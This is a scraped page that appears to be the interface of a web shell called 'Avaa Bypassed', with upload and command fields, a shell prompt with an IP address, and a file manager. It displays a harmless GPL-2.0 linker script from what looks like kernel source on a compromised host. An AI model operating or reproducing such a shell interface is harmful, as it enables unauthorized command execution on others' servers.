404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.21.166.125: ~ $
/* SPDX-License-Identifier: GPL-2.0 */
MEMORY 
	{
	flash : ORIGIN = 0x00000000,
	        LENGTH = 0x00100000
	}

SECTIONS
{
	.text :
	{
		stext = . ;
		*(.text)
		etext = . ;
	} > flash
	.data :
	{
		*(.data)
		edata = . ;
	} > flash
}

Filemanager

Name Type Size Permission Actions
Makefile File 1.57 KB 0644
rescue_v10.lds File 236 B 0644
rescue_v32.lds File 737 B 0644